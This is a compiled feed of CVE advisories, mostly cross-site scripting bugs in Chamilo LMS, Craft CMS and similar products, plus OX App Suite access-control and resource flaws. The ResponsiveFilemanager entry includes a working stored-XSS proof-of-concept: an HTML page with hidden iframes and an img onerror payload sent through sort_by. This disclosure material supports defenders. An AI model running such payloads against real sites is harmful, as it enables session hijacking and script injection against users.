Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the course category parameters.

CVE-2023-31804: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skype and linedin_url parameters.

CVE-2023-31802: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skills wheel parameter.

CVE-2023-31801: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the forum title parameter.

CVE-2023-31800: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Trippo ResponsiveFilemanager v.9.14.0 and before allows a remote attacker to execute arbitrary code via the sort_by parameter in the dialog.php file.

After taking another look at the ResponsiveFilemanager 9.14.0 i noticed that in the dialog.php file on line 229 that if the $\_SESSION\['RF'\]\['sort\_by'\] is already set that there would not be done any validation.  
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L235  
This created a problem because in ajax\_calls.php in the "sort" action in the "sort\_by" parameter it is possible to set that value without any validation.  
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/ajax\_calls.php#L73  
This means if you would first request a session by going to the dialog.php, than going to the ajax\_calls.php and request the sort action and as "sort\_by" parameter you give a html tag.  
Than if you done al that go back to the dialog.php page than $\_SESSION\['RF'\]\["sort\_by"\] would be read and unescaped placed on all places where $sort\_by is used what created stored xss until the session isn't valid anymore.  
A very simple patch would be to add fix\_get\_params() in the dialog.php on line 235 when the $sort\_by is set.  
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L235

I made a simple html file you can use to validate this vulnerability.  
It is made for Firefox because it does make use of iframe's and a clickjacking vulnerability but if the session was already set than this would also work in other browsers with a miner change.  
you would need to change all "http://192.168.0.11:3001" to your website.  
When runned it would make 3 iframe's.  
One to request the dialog.php file to get a PHPSESSID and to set $\_SESSION\['RF'\]\["verify"\] as RESPONSIVEfilemanager.  
Second it would open the ajax\_calls.php to set the html tag.  
And tirth it reopens the dialog.php page to trigger the stored xss:

<!DOCTYPE html\>
<html\>
<head\>
<script\>
var url \= "http://192.168.0.11:3001";
/\*\* 
Execute the "sort" action in ajax\_calls.php and set as "sort\_by" a html tag.
This will set $\_SESSION\['RF'\]\["sort\_by"\] on line 73 as my html tag.
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/ajax\_calls.php#L73
\*\*/
function iframe1(){
	var ifrm \= document.createElement("iframe");
	ifrm.setAttribute("src", url+"/filemanager/ajax\_calls.php?action=sort&sort\_by=%22%3E%3Cimg/src=%27x%27/onerror=alert(document.domain)%3E", "myWindow", "width=200, height=100");
	ifrm.setAttribute("onload", "iframe2();");
	ifrm.setAttribute("style", "visibility: hidden;");	
	ifrm.style.width \= "640px";
	ifrm.style.height \= "480px";
	document.body.appendChild(ifrm);
}

/\*\* 
Go back to the dialog.php to trigger a xss starting at line 235 because when $\_SESSION\['RF'\]\["sort\_by"\] is already set and the sort\_by parameter isn't set than it would use the data from $\_SESSION\['RF'\]\["sort\_by"\].
And if sort\_by isn't set than it won't execute fix\_get\_params() what would prevented xss.
because in ajax\_calls.php this value wasn't sanitized with fix\_get\_params() when we setted the $\_SESSION\['RF'\]\["sort\_by"\] there is a stored xss until the session is expired.
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/dialog.php#L235
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/include/utils.php#L686
\*\*/
function iframe2(){
	var ifrm1 \= document.createElement("iframe");
	ifrm1.setAttribute("src", url+"/filemanager/dialog.php?type=0&lang=en\_EN&popup=0&crossdomain=0&relative\_url=0&akey=key&fldr=/", "myWindow", "width=200, height=100");
	ifrm1.setAttribute("style", "visibility: hidden;");	
	ifrm1.style.width \= "640px";
	ifrm1.style.height \= "480px";
	document.body.appendChild(ifrm1);
}

</script\>
</head\>
<body\>

<iframe src\="http://192.168.0.11:3001/filemanager/dialog.php?type=0&lang=en\_EN&popup=0&crossdomain=0&relative\_url=0&akey=key&fldr=/", width\=200, height\=100 onload\="iframe1();" style\="visibility: hidden;" sandbox\>

</body\>
</html\>

A CVE has been requested.

CVE-2021-31711: Stored xss in v9.14.0 in dialog.php in $_SESSION['RF']["sort_by"] because of no validation if ajax_calls.php setted this session. · Issue #661 · trippo/ResponsiveFilemanager

Time Tracker is an open source time tracking system. The week view plugin in Time Tracker versions 1.22.11.5782 and prior was not escaping titles for notes in week view table. Because of that, it was possible for a logged in user to enter notes with elements of JavaScript. Such script could then be executed in user browser on subsequent requests to week view. This issue is fixed in version 1.22.12.5783. As a workaround, use `htmlspecialchars` when calling `$field->setTitle` on line #245 in the `week.php` file,  as happens in version 1.22.12.5783.

Expand Up @@ -242,7 +242,7 @@ function render(&$table, $value, $row, $column, $selected = false) { $field\->setValue($table\->getValueAt($row,$column)\['duration'\]); // Duration for even rows. } else { $field\->setValue($table\->getValueAt($row,$column)\['note'\]); // Comment for odd rows. $field\->setTitle($table\->getValueAt($row,$column)\['note'\]); // Tooltip to help view the entire comment. $field\->setTitle(htmlspecialchars($table\->getValueAt($row,$column)\['note'\])); // Tooltip to help view the entire comment. } } else { $field\->setValue($table\->getValueAt($row,$column)\['duration'\]); Expand Down

CVE-2023-32066: Addressed stored XSS vulnerability in week.php by escaping cell title. · anuko/timetracker@093cfe1

Cross Site Scripting vulnerability found in Phodal CMD v.1.0 allows a local attacker to execute arbitrary code via the EMBED SRC function.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-18280: XSS vulnerability in <EMBED> label,SVG include attack vector.  · Issue #20 · phodal/md

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via a crafted payload to the personal notes function.

CVE-2023-31807

Craft CMS is a content management system. Starting in version 3.0.0 and prior to versions 3.8.4 and 4.4.4, a malformed title in the feed widget can deliver a cross-site scripting payload. This issue is fixed in version 3.8.4 and 4.4.4.

Expand Up

@@ -310,13 +310,13 @@ public function getSettingsHtml(): ?string

$view\->registerAssetBundle(TimepickerAsset::class);

$view\->registerAssetBundle(TableSettingsAsset::class);

$view\->registerJs('new Craft.TableFieldSettings(' .

Json::encode($view\->namespaceInputName('columns'), JSON\_UNESCAPED\_UNICODE) . ', ' .

Json::encode($view\->namespaceInputName('defaults'), JSON\_UNESCAPED\_UNICODE) . ', ' .

Json::encode($this\->columns, JSON\_UNESCAPED\_UNICODE) . ', ' .

Json::encode($this\->defaults ?? \[\], JSON\_UNESCAPED\_UNICODE) . ', ' .

Json::encode($columnSettings, JSON\_UNESCAPED\_UNICODE) . ', ' .

Json::encode($dropdownSettingsHtml, JSON\_UNESCAPED\_UNICODE) . ', ' .

Json::encode($dropdownSettingsCols, JSON\_UNESCAPED\_UNICODE) .

Json::encode($view\->namespaceInputName('columns')) . ', ' .

Json::encode($view\->namespaceInputName('defaults')) . ', ' .

Json::encode($this\->columns) . ', ' .

Json::encode($this\->defaults ?? \[\]) . ', ' .

Json::encode($columnSettings) . ', ' .

Json::encode($dropdownSettingsHtml) . ', ' .

Json::encode($dropdownSettingsCols) .

');');

  

$columnsField = $view\->renderTemplate('\_components/fieldtypes/Table/columntable.twig', \[

Expand Down

CVE-2023-31144: Merge branch 'v3' of https://github.com/craftcms/cms into develop · craftcms/cms@52bd161

OX App Suite has patched for sensitive information disclosure, cross site scripting, improper access control, authorization bypass, and resource consumption vulnerabilities. Some of the issues affect OX App Suite frontend version 7.10.6-rev23 and some affect OX App Suite backend version 7.10.6-rev36.

Internal reference: OXUIB-2130  
Type: CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)  
Component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite frontend 7.10.6-rev23  
First fixed revision: OX App Suite frontend 7.10.6-rev24  
Discovery date: 2023-01-03  
Solution date: 2023-02-06  
Disclosure date: 2023-05-05  
Researcher credits: Tim Coen  
CVE: CVE-2023-24597  
CVSS: 4.2 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N)

Details:  
Remote resources are loaded in print view. When E-Mail is flagged as Spam or if a user has enabled the feature as a default, remote content in E-Mail is not requested automatically to improve users privacy. However when printing a E-Mail, external content was loaded automatically without user consent.

Risk:  
Malicious remote content in E-Mail, like tracking pixels, could be used to analyze user behaviour. No publicly available exploits are known.

Solution:  
We now apply the same setting for loading external content when generating the E-Mail print content.

---

Internal reference: OXUIB-2034  
Type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite frontend 7.10.6-rev23  
First fixed revision: OX App Suite frontend 7.10.6-rev24  
Discovery date: 2022-11-02  
Solution date: 2023-02-06  
Disclosure date: 2023-05-05  
CVE: CVE-2023-24601  
CVSS: 4.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)

Details:  
XSS with non-app deeplinks like "registry". The "registry" sub-tree of the jslob API is used to define which application modules and dependencies shall be loaded. Users were able to inject arbitrary references, including malicious code.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface and API. To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. No publicly available exploits are known.

Solution:  
We made the relevant jslob path read-only for users.

---

Internal reference: OXUIB-2033  
Type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite frontend 7.10.6-rev23  
First fixed revision: OX App Suite frontend 7.10.6-rev24  
Discovery date: 2022-02-11  
Solution date: 2023-02-06  
Disclosure date: 2023-05-05  
CVE: CVE-2023-24602  
CVSS: 4.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)

Details:  
XSS at Tumblr portal widget due to missing content sanitization. External content, like post titles, have been evaluated as HTML when adding Tumblr feeds to the portal page.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface and API. To exploit this an attacker would require temporary access to the users account, compromise a Tumblr feed or make the victim include a malicious feed. No publicly available exploits are known.

Solution:  
We now insert untrusted external content as plain-text.

---

Internal reference: MWB-1998  
Type: CWE-284 (Improper Access Control)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev36  
First fixed revision: OX App Suite backend 7.10.6-rev37  
Discovery date: 2023-01-10  
Solution date: 2023-02-06  
Disclosure date: 2023-05-05  
Researcher credits: Tim Coen  
CVE: CVE-2023-24600  
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

Details:  
"Read own/delete all" permissions allows moving other users contacts to own address book. Folder ACL combinations like "read own, delete all" were incorrectly applied and allowed that users could move objects which they were not expected to read.

Risk:  
Moving objects to folders with read access effectively bypassed the "read own" restriction. No publicly available exploits are known.

Solution:  
Permission checks have been updated and include checking for read permissions when performing move operations.

---

Internal reference: MWB-1997  
Type: CWE-284 (Improper Access Control)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev36  
First fixed revision: OX App Suite backend 7.10.6-rev37  
Discovery date: 2023-01-10  
Solution date: 2023-02-06  
Disclosure date: 2023-05-05  
Researcher credits: Tim Coen  
CVE: CVE-2023-24605  
CVSS: 5.9 (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N)

Details:  
API access not fully restricted when requiring 2FA. When using the built-in multi-factor authentication, access to a number of API endpoints was possible prior to successful authentication using the second factor.

Risk:  
Attackers with access to victims credentials were able to perfom limited read operations on contacts and drive as well as modifying names of the multi-factor tokens. No publicly available exploits are known.

Solution:  
We added permission checks to make sure all kind of API paths are restricted prior to being fully authenticated.

---

Internal reference: MWB-1995  
Type: CWE-639 (Authorization Bypass Through User-Controlled Key)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev36  
First fixed revision: OX App Suite backend 7.10.6-rev37  
Discovery date: 2023-01-09  
Solution date: 2023-02-06  
Disclosure date: 2023-05-05  
Researcher credits: Tim Coen  
CVE: CVE-2023-24598  
CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

Details:  
Distribution lists allow discovering private contacts of other users. Editing distribution lists allows to add contacts from foreign accounts, where the attacker has no read access.

Risk:  
Attackers within the same context can discover fragments of contact information from folders without read access, including other users personal contact folders. No publicly available exploits are known.

Solution:  
We improved permission checks when editing distribution lists to restrict access.

---

Internal reference: MWB-1983  
Type: CWE-400 (Uncontrolled Resource Consumption)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev36  
First fixed revision: OX App Suite backend 7.10.6-rev37  
Discovery date: 2023-01-03  
Solution date: 2023-02-06  
Disclosure date: 2023-05-05  
CVE: CVE-2023-24604  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)

Details:  
Header length does not get limited for external content. HTTP client requests initiated by App Suite middleware were not validating the lenght of HTTP headers.

Risk:  
In case an attacker-controlled resource (e.g. iCal feed) returned excessive amount of HTTP headers, the system could temporarily lock up processing those headers. No publicly available exploits are known.

Solution:  
We introduced a limitation for HTTP header length and reject processing if a threshold is hit.

---

Internal reference: MWB-1981  
Type: CWE-400 (Uncontrolled Resource Consumption)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev36  
First fixed revision: OX App Suite backend 7.10.6-rev37  
Discovery date: 2023-01-03  
Solution date: 2023-02-06  
Disclosure date: 2023-05-05  
CVE: CVE-2023-24603  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)

Details:  
Size limits for external content are not considered for data transfer. HTTP client requests initiated by App Suite middleware were not stopping downloads for resources that exceed size limits.

Risk:  
In case an attacker-controlled resource (e.g. iCal feed) returned excessive amount of data, it would be fully downloaded before applying size checks. While this could not be used to lock up the system, its a plausible amplification vector for denial of service attacks to other services. No publicly available exploits are known.

Solution:  
We improved the limitation for content length and immediately stop downloading if a threshold is hit.

---

Internal reference: MWB-1978  
Type: CWE-639 (Authorization Bypass Through User-Controlled Key)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev36  
First fixed revision: OX App Suite backend 7.10.6-rev37  
Discovery date: 2023-01-01  
Solution date: 2023-02-06  
Disclosure date: 2023-05-05  
Researcher credits: Tim Coen  
CVE: CVE-2023-24599  
CVSS: 7.1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L)

Details:  
Users can change arbitrary appointments by ID confusion. Appointments of other users could be changed without the appropriate autorization by sending conflicting object IDs within the same request.

Risk:  
Attackers within the same context can modify fragments of appointment information from folders without read access, including other users personal calendar folders. No publicly available exploits are known.

Solution:  
We improved permission checks when updating appointments to restrict access.

Tag

#xss